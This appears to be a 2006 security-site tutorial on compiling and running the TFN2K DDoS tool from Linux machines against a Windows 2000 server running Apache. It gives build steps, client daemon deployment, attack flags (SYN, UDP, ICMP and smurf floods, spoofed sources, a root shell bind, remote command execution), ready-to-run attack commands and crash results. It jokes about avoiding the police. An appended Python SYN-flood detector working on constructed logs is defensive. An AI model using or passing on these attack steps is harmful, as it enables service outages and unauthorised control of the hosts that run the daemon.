Using Linux systems for DDoS attacks against Windows servers

ID MYHACK58:62200612500
Type myhack58
Reporter Anonymous
Modified 2006-10-25T00:00:00


The test uses Red Hat Linux, currently the best-known distribution; for this attack test I am using Fedora Core 3. The software is the best-known DDoS attack tool, TFN2K, in its Linux version. The system being attacked is a Windows 2000 Server running Apache 2, FTP and VNC; the other services matter little, since the attack is mainly aimed at Apache.

  1. Decompress: tar -zxvf tfn2k.tgz
  2. Install TFN2K. TFN2K is open-source software, so it has to be compiled. That needs little explanation and the build should normally go through, but a few places need attention, because different Linux versions and vendors require different settings. Modify src/ip.h and comment out the following section, otherwise compilation fails.

/* struct in_addr { unsigned long int server_address; }; */

Then run make to compile. During compilation you are prompted to set the server password (8-32 characters); it has to be entered when attacking. After compilation two new files appear, td and tfn. td is the daemon, the process that runs on the clients, and tfn is the server control process. To attack someone you must first start the td process and then run the server process, otherwise the attack has no effect. To change the password, run mkpass. Finally, install and run td on all clients (root privileges required), and on the server create a text file that records the IP addresses of all clients (editing it with vi works), in the format:

IP
IP
.....

Then run ./tfn on the primary server.

  3. Attack

Run ./tfn and press Enter to see the parameters; friends whose English is good probably do not need me to say more :)

Format: ./tfn <parameters>

Parameters that are of no use here are not covered. The ones used for attacking are:

-f  followed by the name of the text file just written; this is what makes it a real DDoS attack rather than DoS
-h  DoS attack, i.e. a single machine, one-on-one; followed by a host or IP address
-p  followed by a port; needs no explanation
-c  the most critical parameter, with 11 options in total:

  0 - stop the attack
  1 - set the anti-spoofing level. When attacking, TFN sends packets with a source address, but the source address is random, that is to say the address is not your own, so don't worry about the cops, haha
  2 - change the packet size: by default the ICMP/8, smurf and udp attacks use small packets. You can increase the size by changing the number of payload bytes in each packet.
  3 - bind root shell: starts a session service; connecting to the specified port then gives you a root shell.
  4 - UDP flood attack: this attack exploits the fact that each UDP packet sent to a closed port causes an ICMP unreachable message to be returned, which increases the strength of the attack.
  5 - SYN flood attack: this attack regularly sends false connection requests. The result is denial of service on the target port and a full TCP connection table; TCP/RST responses to hosts that do not exist increase the attack potential. This is the standard denial-of-service attack.
  6 - ICMP echo (ping) attack: this attack sends ping requests with a false source address, and the target host sends back response packets of the same size.
  7 - SMURF attack: sends ping requests carrying the target host's address to broadcast addresses for amplification, so that the target host receives the reply many times over.
  8 - MIX attack: alternately sends udp, syn and icmp packets in a 1:1:1 ratio, so that routers, other packet-forwarding devices, NIDS, sniffers and so on are bombarded in turn :)
  9 - TARGA3 attack
  10 - remote command execution. This parameter is an additional feature of TFN; in fact TFN is not only for DoS attacks but can also be used for remote control, for example:

    ./tfn -f hostext -c 10 -i "mkdir /root/edison"

    creates edison in root's home directory on all of the hosts; -i is followed by the "command".

That basically covers the parameters. The attacks follow.

./tfn -f hostext -c 4 -i
Use the hosts recorded in the hostext file to carry out a UDP attack on the 163 server (all of the hosts must already have the td process started).

./tfn -f hostext -c 5 -i -p 80
Use the hosts recorded in the hostext file to carry out a TCP denial-of-service attack on the 163 server (80 attacks the web service; the others need no explanation).

./tfn -f hostext -c 6 -i
Use the hosts recorded in the hostext file to carry out an ICMP attack on the 163 server (ping attack; buffer overflow, crashes immediately).

./tfn -f hostext -c 8 -i
Use the hosts recorded in the hostext file to attack the 163 server with ICMP, TCP and UDP in turn (if the other side is running a sniffer, it will certainly cry itself to death).

./tfn -f hostext -c 0
Make the hosts stop the attack.

Test results:

One-on-one attack, TCP connection attack: local CPU 13%, attacked server CPU usage above 70%, fluctuating from time to time.
Two-on-one attack, TCP connection attack: local CPU 13% per machine, attacked server CPU usage 100%.
Five-against-one attack, TCP connection attack: local CPU 13% per machine, attacked server crashes.

I only have 6 machines at home, but with a few more, say dozens of machines, an ordinary personal server will definitely go down.

One-on-one attack, ICMP attack mode: local CPU 18%, attacked server CPU usage 96% or more, fluctuating constantly.
Two-on-one attack, ICMP attack mode: local CPU 18% per machine, attacked server cannot get on the network, is almost unusable, and crashes within half an hour.
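On the defending side, the SYN flood mode described above (-c 5, with random spoofed source addresses) leaves a recognizable trace: a burst of SYNs from many distinct sources to one service, almost none of which complete the handshake. The following Python code is an added example, not part of the original article or of TFN2K; the log format, thresholds and addresses are constructed assumptions.

```python
from collections import defaultdict

def parse(line):
    # Constructed log format: "<epoch> <src_ip> <dst_ip> <dst_port> <tcp_flags>"
    ts, src, dst, port, flags = line.split()
    return float(ts), src, dst, int(port), flags

def detect_syn_flood(lines, window=10.0, min_syns=100, max_completion=0.1):
    """Return {(dst, port): stats} for services whose SYNs mostly never complete.
    A handshake counts as completed when a source that sent a SYN later sends
    a bare ACK to the same service; spoofed random sources never do."""
    syn_times = defaultdict(dict)   # (dst, port) -> {src: time of first SYN}
    completed = defaultdict(set)    # (dst, port) -> sources that followed up with ACK
    for ts, src, dst, port, flags in map(parse, lines):
        key = (dst, port)
        if flags == "S":
            syn_times[key].setdefault(src, ts)
        elif flags == "A" and src in syn_times[key]:
            completed[key].add(src)
    alerts = {}
    for key, srcs in syn_times.items():
        times = sorted(srcs.values())
        # Densest burst: most distinct SYN sources inside any `window` seconds.
        burst, lo = 0, 0
        for hi, t in enumerate(times):
            while t - times[lo] > window:
                lo += 1
            burst = max(burst, hi - lo + 1)
        ratio = len(completed[key]) / len(srcs)
        if burst >= min_syns and ratio <= max_completion:
            alerts[key] = {"sources": len(srcs), "burst": burst,
                           "completion_ratio": round(ratio, 3)}
    return alerts

def sample_log():
    # Constructed traffic: 5 normal clients completing handshakes on ports 80
    # and 21, then 250 SYNs to port 80 from unique documentation-range
    # addresses that never send the final ACK.
    lines = []
    for i in range(5):
        for port in (80, 21):
            lines.append(f"{100 + i} 198.51.100.{i + 1} 192.0.2.10 {port} S")
            lines.append(f"{100.2 + i} 198.51.100.{i + 1} 192.0.2.10 {port} A")
    for i in range(250):
        lines.append(f"{200 + i * 0.01:.2f} 203.0.113.{i + 1} 192.0.2.10 80 S")
    return lines

if __name__ == "__main__":
    print(detect_syn_flood(sample_log()))
```

Only port 80 is flagged in the sample; the FTP port sees the same legitimate clients but no burst, so it stays below the threshold.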